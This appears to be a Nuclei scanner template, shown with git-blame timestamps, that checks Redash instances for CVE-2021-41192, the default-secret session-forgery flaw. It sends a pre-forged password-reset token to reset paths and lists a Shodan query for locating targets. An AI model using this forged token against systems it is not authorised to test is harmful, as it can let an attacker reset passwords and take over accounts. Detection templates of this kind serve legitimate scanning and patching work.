2022-02-25 16:17:47 +00:00
id : CVE-2021-41192
info :
2022-03-25 11:45:10 +00:00
name : Redash Setup Configuration - Default Secrets Disclosure
2022-02-25 16:17:47 +00:00
author : bananabr
2022-02-27 10:32:13 +00:00
severity : medium
2022-05-17 09:18:12 +00:00
description : Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
2022-02-25 16:17:47 +00:00
reference :
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
2023-04-12 10:55:48 +00:00
- https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214
2022-02-27 10:32:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2022-02-27 10:32:13 +00:00
cve-id : CVE-2021-41192
cwe-id : CWE-1188
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
epss-score : 0.00628
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-04-22 10:38:41 +00:00
shodan-query : http.favicon.hash:698624197
2022-08-27 04:41:18 +00:00
tags : hackerone,cve,cve2021,redash,auth-bypass
2022-02-25 16:17:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 16:17:47 +00:00
- method : GET
path :
2022-02-25 19:19:01 +00:00
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
2022-02-26 20:57:18 +00:00
2022-02-25 19:10:32 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
2022-02-26 20:57:18 +00:00
part : body
2022-02-25 19:10:32 +00:00
words :
2022-02-26 20:57:18 +00:00
- "Enter your new password:"
- "redash"
condition : and
2022-02-25 19:10:32 +00:00
- type : status
status :
2022-02-25 19:19:01 +00:00
- 200
2022-03-25 11:45:10 +00:00
# Enhanced by mp on 2022/03/23